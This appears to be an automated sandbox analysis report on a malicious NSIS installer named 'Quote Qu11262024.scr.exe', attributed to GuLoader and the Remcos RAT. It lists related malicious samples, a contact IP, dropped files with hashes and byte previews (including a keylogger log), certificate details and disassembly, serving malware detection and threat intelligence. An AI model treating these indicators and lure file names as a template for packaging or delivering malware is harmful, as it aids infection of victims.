                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              37f463bf4616ecd445d4a1937da06e19Factura 9000012567.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 164.160.91.32
                                                                              Comprobante de pago.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              • 164.160.91.32
                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 164.160.91.32
                                                                              Factura 9000012567.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 164.160.91.32
                                                                              Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 164.160.91.32
                                                                              SPP_14667098030794_8611971920#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 164.160.91.32
                                                                              021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 164.160.91.32
                                                                              6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                                                              • 164.160.91.32
                                                                              rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 164.160.91.32
                                                                              ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              • 164.160.91.32
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dllCalyciform.exeGet hashmaliciousGuLoaderBrowse
                                                                                Calyciform.exeGet hashmaliciousGuLoaderBrowse
                                                                                  ZOj46Y8Mb1.exeGet hashmaliciousUnknownBrowse
                                                                                    TouchEn_nxKey_32bit.exeGet hashmaliciousUnknownBrowse
                                                                                      Qz.exeGet hashmaliciousUnknownBrowse
                                                                                        Qz.exeGet hashmaliciousUnknownBrowse
                                                                                          scan_doc20240628154931011588.com.exeGet hashmaliciousGuLoaderBrowse
                                                                                            scan_doc20240628154931011588.com.exeGet hashmaliciousGuLoaderBrowse
                                                                                              Order 0002939399440.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                Order 0002939399440.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):216
                                                                                                  Entropy (8bit):3.372588052433575
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:rhlKlyKH1Rl02ql55JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:6lZO2ql55YcIeeDAlOWAAe5q1gWAv
                                                                                                  MD5:6E4374AD5F0E3D0F10A3A00D8C2A41D5
                                                                                                  SHA1:F062FF1708D3211EDDF216845D9C294C557E4CAC
                                                                                                  SHA-256:E7A2C7374F70A468F914901CD175F919BF790EE9E663AFDA75445E445BD3B095
                                                                                                  SHA-512:6552756BAB453C5C74D14542A706C83A7839B6D7245565206DCB3B1357BAE9CE9AD78283CB479909EC6A1396B7B4B31FF865E563D9AAA1558063936D0D8511DF
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Preview:....[.2.0.2.4./.1.2./.0.2. .0.8.:.4.3.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):963
                                                                                                  Entropy (8bit):5.014904284428935
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                  MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                                  SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                                  SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                                  SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):48
                                                                                                  Entropy (8bit):4.829448698502606
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:15KlW9HAQLQIfLBJXlFGfv:1IlW9gQkIPeH
                                                                                                  MD5:E7F60749537446D1C77072173B5415A3
                                                                                                  SHA1:B9CFEF43585C8B26A5DAA2FE581859759A183C67
                                                                                                  SHA-256:3E1FC0E4A2EA442BF9F3DD4AE9444F8C595B9E7701DE2FD7ABCF7F7B29D9C683
                                                                                                  SHA-512:D125EDEA7D087009C00747B7C695A21F99B330DD5058FB0A2E3CD68EAFCACA63CAD591722DA6355A0FBC60D2E9710877BFAC713ECEEA64E7D9E6133599AFE884
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:[ExReBoot]..Acc=user32::EnumWindows(i r2 ,i 0)..
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:Extensible storage user DataBase, version 0x620, checksum 0x737c8992, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17301504
                                                                                                  Entropy (8bit):1.0259158854235055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:TvQBV7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqkoT:DyUt3F0TkT0TAitKxK9JdQ84AgC
                                                                                                  MD5:1E48D40A8A59F10F356E33AA4FEB1C1B
                                                                                                  SHA1:950879F1AB1D17A95D90FE3AD90BB3B546264F39
                                                                                                  SHA-256:5E72CE442182A49F93CFFAE6701F5750E2B460D73C74EFC86040A43688FF004B
                                                                                                  SHA-512:13474358A2AF3FEE5A1E79D8FC10EF3E15BCC675ACB30CB4AF50E80F334904695654591599D0811EC3EC4335CF274BBE202D8E04CCB241AF0150B55DFD5D7385
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:s|..... .......4.........gN;....{........................&....../...{...+...|;.h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{...................................'P%.+...|;.................LX...+...|;..........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11776
                                                                                                  Entropy (8bit):5.832316471889005
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:4PtkiQJr7jHYT87RfwXQ6YSYtOuVDi7IsFW14Ll8CO:H78TQIgGCDp14LGC
                                                                                                  MD5:B0C77267F13B2F87C084FD86EF51CCFC
                                                                                                  SHA1:F7543F9E9B4F04386DFBF33C38CBED1BF205AFB3
                                                                                                  SHA-256:A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77
                                                                                                  SHA-512:F2B57A2EEA00F52A3C7080F4B5F2BB85A7A9B9F16D12DA8F8FF673824556C62A0F742B72BE0FD82A2612A4B6DBD7E0FDC27065212DA703C2F7E28D199696F66E
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Calyciform.exe, Detection: malicious, Browse
                                                                                                  • Filename: Calyciform.exe, Detection: malicious, Browse
                                                                                                  • Filename: ZOj46Y8Mb1.exe, Detection: malicious, Browse
                                                                                                  • Filename: TouchEn_nxKey_32bit.exe, Detection: malicious, Browse
                                                                                                  • Filename: Qz.exe, Detection: malicious, Browse
                                                                                                  • Filename: Qz.exe, Detection: malicious, Browse
                                                                                                  • Filename: scan_doc20240628154931011588.com.exe, Detection: malicious, Browse
                                                                                                  • Filename: scan_doc20240628154931011588.com.exe, Detection: malicious, Browse
                                                                                                  • Filename: Order 0002939399440.bat.exe, Detection: malicious, Browse
                                                                                                  • Filename: Order 0002939399440.bat.exe, Detection: malicious, Browse
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....oZ...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2404960
                                                                                                  Entropy (8bit):2.5395952871773138
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:zp9NuTTVGSypk07o6vcf9j9EIq9CzDclD7FmVXhK:rcTP07o6vcf9j4cIlm3K
                                                                                                  MD5:7C95968892C55A7B03F0B9E92AB09418
                                                                                                  SHA1:8B63D2C36B2F6CF427FF818343A58EBFD2F36627
                                                                                                  SHA-256:32E3F56B87335E212A8E6CD5FD1D6B5972F21D2CD2D7D5DD2455EB1FFF49E3C8
                                                                                                  SHA-512:918CC0B32003713C26BBC3A10EE889F1B086427994BF086F5791F1118F360A9E3B803B396B5C4A4DE08D993A200EB4215C65D5596DC2CB480A3392D12EE7276C
                                                                                                  Malicious:false
                                                                                                  Preview:.!......,.......................|........ .......!..........................................................................................................................................................................................................................................J...d...........6...j...........................................................................................................................................h...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Preview:..
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                  Category:dropped
                                                                                                  Size (bytes):840424
                                                                                                  Entropy (8bit):7.770085545516383
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:7b0EifOJq8Ikm2qv1GV8gmxJziOoA3TB98/0v7Z0Q9i4xw3u5IDkd72gGmkRJWk6:7bxgGKLz8G/XBO/0vOAi4xwk9VS6n
                                                                                                  MD5:A75036F188683604D03DD8F03FEE6EC3
                                                                                                  SHA1:CC2C07398C85FFCD033223D01155851647D0EE68
                                                                                                  SHA-256:4C1DF01C44C5A69F9EFA30528117C3D90F2DF8A78C23A7CCC25412DA15793531
                                                                                                  SHA-512:2A32707969A776C20150AB79B62204918AD6A96599ACC99C7D6E99CE1C43EADB77FDF79C0DC59EB517005AB16D6AAA28AB229E68D20BF087EC82A957837390E1
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 53%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...2.oZ.................b..........(3............@.................................e.....@.................................(............3...........................................................................................................text...w`.......b.................. ..`.rdata..H............f..............@..@.data...8............z..............@....ndata...p...P...........................rsrc....3.......4...~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):27
                                                                                                  Entropy (8bit):4.134336113194451
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:iGAeSMn:lAeZ
                                                                                                  MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                                                                                  SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                                                                                  SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                                                                                  SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                                                                                  Malicious:false
                                                                                                  Preview:[Access]..Setting=Enabled..
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):417794
                                                                                                  Entropy (8bit):1.2604489976240323
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:IH38q19Gox/+ocJRyPSJyeJibBF1cI88:28qWo1+NjyEJGneI
                                                                                                  MD5:8F6A1FB71F8C94082AAA204866BED5E7
                                                                                                  SHA1:740C5920F7D58E3B33CA72726797F1E94B57CCF0
                                                                                                  SHA-256:262DC6252DDC3F3ED30A5CE9338E19D9B414CFF8E0FEB1122D1B6EA1F46A693E
                                                                                                  SHA-512:1F985FF6100A588F2E7B52197EE98AABCE3020F1890BE347D07F22FCF65517D7D1162A7C14128836FA5F9CBFF147F0D16E150740ADE361984B07F672C141EC24
                                                                                                  Malicious:false
                                                                                                  Preview:...s...............l.........................1J........................................................................................................D..........B....................................................................................0...................................................................A^...........v...............5.....................k.....i....................................................................................................................../.....................................................b.........Y........................................Q....&...................................r..........................................................................d........................................................................................................................2................................................................................(....................................8..........................................g.....
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):148996
                                                                                                  Entropy (8bit):4.602197412441984
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:YvOkEUlQdFCVx3Z1Ri6lCrNMY2Sm8KA0LqtDfqAvKydqWSc7Qhg0fL8Rad:YvNXl9xp1M6YNMYIqtDfxifXhVfLwad
                                                                                                  MD5:6E4703CD9E9E0A1C7C16BA32C011610F
                                                                                                  SHA1:2A6DBAF66FC16A5A9A6A887459C35526F09DF401
                                                                                                  SHA-256:806A235DEC1BBD5B4165048E0A6539CC7402E34DD44C0318D57B4D213C570962
                                                                                                  SHA-512:33173EF93E9FEBA4923B6C5EF567703206189EDE41D8CA49B8B98784FED78FF755F51EE082FAB23268F70ADF964CE8935968FDA0C5E4DB1DB4F1D5E91E590F1C
                                                                                                  Malicious:false
                                                                                                  Preview:..........>.................AA......2.[.............................'...............~~.........K........q.2.H................^................N......m............1...^^^...CC.4....1111111...kk........6......................rrr.......$..+..ll...........DD................... ............... ........................................^^^^.//......-......X.u........}.......uuu..u..........................b................WWW.___..........................bb.........W..........C........%........{....~~.........w..v.T...........~._..........kk......x.............ZZ..........O...WW..7.........88888..E...................\\...............Q.p..................p..).ff....aaa.))........f........Z.........Q...........\\\\\..k...~~.............SSS....????...5............F..?.......(.?...KK.I.....W....$$$$....VVV.......D..........nnn............5.v........N............@....f.SSS.R.T....|..........*.*..........==...VVV.----...WW....n.........................*.CCCCCCC..cc...........##...5.............".HH.
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):311982
                                                                                                  Entropy (8bit):1.2468660022613356
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:AbYDZrXydiY1rBP4IALmVQ8VeY9A3G2mJ8vd8vO4uZy0+z0uz61JkbQfJTSXQ47N:AA76b48vOc6FYQ4ORsROC/XIueK3
                                                                                                  MD5:890862A8F2EE66B298E63B39D24A7E46
                                                                                                  SHA1:3CDEB53F8CD8B973C4EC8FB7A4CD65C5708FEAB9
                                                                                                  SHA-256:87A3069C88C11C4419E968BA3EFE99EE632AF967D1503DD952EED62D0BDA0B0F
                                                                                                  SHA-512:1A29453A0DC07E3100C67EDA8C310F9DC0ED45EB58530F0D397EA83EA721CFD072B98901629F2EBD5EB67B996DB69856B0B5C1EA329DE105C8FF72CE8E44D6CF
                                                                                                  Malicious:false
                                                                                                  Preview:.|........@............................................................................x............................................w.E.q................c...............o................................. .....................;.tN................................................................s...................................................V...........c............z........................IZ................................................../..B.....................................J....>.........................?...F..................}..............................................................@.........U............................................ .........................=............................'.....v..........................]....................F............z................Z............................................C.............................5................................|.......................................................................~.................D.
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):415225
                                                                                                  Entropy (8bit):1.2569004684709615
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:uegXCDFQwwavWgTKEcSG2BLV0GFq9zco0XdgCE5MKoHvBFs3B2Z6+wj0udpWQ8/1:rqwphKbuqWsXoQ2iKNp/8CI72jZmbYH
                                                                                                  MD5:89CF56A21EEF5ABDEDA61A3F57C54528
                                                                                                  SHA1:7E33B5281FC127BE92A72A1E69CC7ADFF26113D0
                                                                                                  SHA-256:11E00CB517CFF62A56E36C1AC41EC3A1312E1668F771B3CB354E202405BAA39D
                                                                                                  SHA-512:9DF0B17FCDD24929B73CD5AF2FFDB1EC829CA008E0B5E0D671789705E52018D1733917300A59CB4ACC28412D9FD07891F21DD625FAE1EE5A18BE02921C0FE610
                                                                                                  Malicious:false
                                                                                                  Preview:.............................................i...e...X....."........................................................*V...........8.................._.............................t......O....................................................................................../..............................................t.............................................n..........................c......k.............................v..............................(.....}..........................................................B...I.........W..............................................2..................................................................#.........................g...............................@.G................i.........w.............................).........................................................1.......................O..............................................................*.........c..Y.....c................p.........................."..............Q......
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):421293
                                                                                                  Entropy (8bit):1.2576565360519947
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:klmEqWGymJGudWSdyVn7abDPJqibgzYLM/tP07:+sW2JGudDmnGb0thk
                                                                                                  MD5:4FD4AF756FA2DEDB912557F41DD2FE36
                                                                                                  SHA1:41ECA6D12131221571C40DEC35EDD0BF626EF311
                                                                                                  SHA-256:DFBE16E07F13A0672235328F5B4C4DF6EDAA2B02B49F6889E8462DC9BBA02E3C
                                                                                                  SHA-512:0EE0C7152CCDDB030399E46C4FA184216E3973E3A2410145AC0CB396CFCDBAD78C04E1AC7AD6CDEAC2293C0507D423946A8DD19EFE1B086C652172D907A45D90
                                                                                                  Malicious:false
                                                                                                  Preview:........................~......a................0.........................................(..........................................-........P........................................................................................................I....................Z{......e.........................*.C........S....................................................................................3............................................................5............X...................3.......).....w.y.......r............q...................!...........................$.=....................................'................................................V.................w.........................3.......................[..............m..............................k....................................................................8...................................................4..........j.......M....................................................N..........................
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):250
                                                                                                  Entropy (8bit):4.274970960725432
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:mQIpOikTCFW1WW9AAeDYgDccFDiQiWchwY4LgdZCJmF:mHgl1WEMDYWmQiWciNJC
                                                                                                  MD5:2BDB0BB01362C0EDD66111BADB8CC8B8
                                                                                                  SHA1:7E460BCDD1FE593BF03739285B79DBC86BA0C1D8
                                                                                                  SHA-256:78D613413A77C154C585BA0E424D996E1F7F83B3A91C09D74326FEAC8075A7D6
                                                                                                  SHA-512:C0B477286DE7CC128059BB9A0BCD21FD3340042BFBA8DA0FD1534005B114907FCF223357E9435D20D58A36B7057F2985F4CA9F6A69A2481CE2B93EDEFA876AF0
                                                                                                  Malicious:false
                                                                                                  Preview:bagkloge circumlental datablok.hereinbelow scrapples bolshevists beguilement,hoopers beheftelserne briolet.doxography usandfrdige alufoliernes.persongruppen unified unclouds sulaba twitchel skrubberiers efterligneren.vinterasters diskantngles llings.
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):294267
                                                                                                  Entropy (8bit):7.506988120493362
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:oc4tWRaVGSyHJwTvnc3ry33xIUGYoPcfDxoq9Qv5i:oTTVGSypk07o6vcf9j9F
                                                                                                  MD5:BBD46F39B5D272F8F84FE820C1F85210
                                                                                                  SHA1:B8C04A3137F2A5890B6249CE6B3CD60C35EC304F
                                                                                                  SHA-256:2BDE59DFB27E73AB8DF7BE83077775528E676D1AF7DFE2FD2D3434C467DF43DD
                                                                                                  SHA-512:A1D76139BA95DFD4FB6CA07ACC974E8EEDD56C2BA529BE7EA6DD866866AFCE8173460558293790B9A9D5D4FDF1F7DD4EBF668E9D3279AA8DE741865935E119AA
                                                                                                  Malicious:false
                                                                                                  Preview:............9................NNNN.......v...............WW......... .m.......M."........tt.........XXXX.......****.lll....................7..;..........ttt..vv.......|...l.KK.....................OO..)..BB..I....%.LLLLL.............**..zzzzz..................AAA....................QQQQ.VVVV........ee..................P.........................RRRR........?.1........................i.||||...........H....'''...........................M.66..H.III........rr....__.....i..................................1111111....l.........................~......vv.............&...xxx.......**.....XX..........................a........B..............gg.......................cccc.[[.o..........kk.....................................%%%....v...D.............................kkk.QQ...........................R. ..............S............yy.kk.............fffffff......{.tt.............................................ff.................CCC.........P.T................H.......................**...^.i..~~~..........j
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 2147483648.000000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):374729
                                                                                                  Entropy (8bit):1.2502346328794884
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:VLpEC/X9anL/HdyWSR1ygL91fPHAoJ6u3agA+Sd7W5b+aAS8sG7cqdEl+SZGOzEB:VLjXsqvLmE5bUfz8QiMSqQKWRk4G04
                                                                                                  MD5:B63FA6412BD973A88487C0FB1C14E325
                                                                                                  SHA1:B952C406F262B756E9AAAEF28E918A74FE94735D
                                                                                                  SHA-256:4E5BCFE2F74928369192069A3283473403C0BED5933874F2B35610185A59EF2A
                                                                                                  SHA-512:639BEC7A82545855045AD84BF037B282C684CB35F794AC88191087C5B3D214D8BAD73F801EC63B73EB4EA8D42723E49AF9416AEB55E8B5652BC0124618150DC0
                                                                                                  Malicious:false
                                                                                                  Preview:..........j.:......L............................. .....3..........F................... ...............w..K..............................s...............................9.....@...............................................G.............................4..[...........................................y..............R....................................................................k..........................................f...........................:...............q..............................Q.......................<..............[.................W............................................|.......'............................................~.........W.................%..................................................C...................................D.............(.......X.............R............9.....................K.....)......>............Y.........t....................7................:...................................................R......8.......................
                                                                                                  Process:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):37
                                                                                                  Entropy (8bit):4.208924987016684
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:PcwF0faDQ3:fFFDW
                                                                                                  MD5:4FA7AA7BCB1E0333D310DDF21EE083A7
                                                                                                  SHA1:111B87E986849F05ECF32F8497881041DE9864BC
                                                                                                  SHA-256:0637271A30774A3AE79C370486DD98F4FD88FA6D2A7ED5EE1D22647E1E4E3C6A
                                                                                                  SHA-512:F295AF2AFF098A6A8E8C3DF09E279428876046CB62C0BCB3CFA374A332BB4D9E88B370607A07D2928150105010BC35DB6F8F5E3564CC34CF41570EA6D864B3D7
                                                                                                  Malicious:false
                                                                                                  Preview:[polyplegia]..Medines=Discontinuous..
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                  Entropy (8bit):7.770085545516383
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:Quote Qu11262024.scr.exe
                                                                                                  File size:840'424 bytes
                                                                                                  MD5:a75036f188683604d03dd8f03fee6ec3
                                                                                                  SHA1:cc2c07398c85ffcd033223d01155851647d0ee68
                                                                                                  SHA256:4c1df01c44c5a69f9efa30528117c3d90f2df8a78c23a7ccc25412da15793531
                                                                                                  SHA512:2a32707969a776c20150ab79b62204918ad6a96599acc99c7d6e99ce1c43eadb77fdf79c0dc59eb517005ab16d6aaa28ab229e68d20bf087ec82a957837390e1
                                                                                                  SSDEEP:12288:7b0EifOJq8Ikm2qv1GV8gmxJziOoA3TB98/0v7Z0Q9i4xw3u5IDkd72gGmkRJWk6:7bxgGKLz8G/XBO/0vOAi4xwk9VS6n
                                                                                                  TLSH:6B05E0E1B101C49AF5EA5CF14D2F953021E67DAC90E4920E65E67728AAF3352209FF4F
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...2.oZ.................b.........
                                                                                                  Icon Hash:524a46466266661a
                                                                                                  Entrypoint:0x403328
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x5A6FED32 [Tue Jan 30 03:57:38 2018 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:57e98d9a5a72c8d7ad8fb7a6a58b3daf
                                                                                                  Signature Valid:false
                                                                                                  Signature Issuer:CN=Hypermnestic, O=Hypermnestic, L=Bordeaux, C=FR
                                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                  Error Number:-2146762487
                                                                                                  Not Before, Not After
                                                                                                  • 16/08/2024 09:45:32 16/08/2027 09:45:32
                                                                                                  Subject Chain
                                                                                                  • CN=Hypermnestic, O=Hypermnestic, L=Bordeaux, C=FR
                                                                                                  Version:3
                                                                                                  Thumbprint MD5:7EE43A09F55C76897D37158298272045
                                                                                                  Thumbprint SHA-1:6D3688C1FF63EF1E7B68F72274D84B5E8C472B0B
                                                                                                  Thumbprint SHA-256:86D71EC7A407BEA6F8FA852438699E8A863343BEB64AD87B460CE8185C8220F3
                                                                                                  Serial:1097ECE382973AC6C1631B6DDCD20FBBEAADAB55
                                                                                                  Instruction
                                                                                                  sub esp, 00000184h
                                                                                                  push ebx
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  xor ebx, ebx
                                                                                                  push 00008001h
                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                  mov dword ptr [esp+10h], 0040A130h
                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                  mov byte ptr [esp+14h], 00000020h
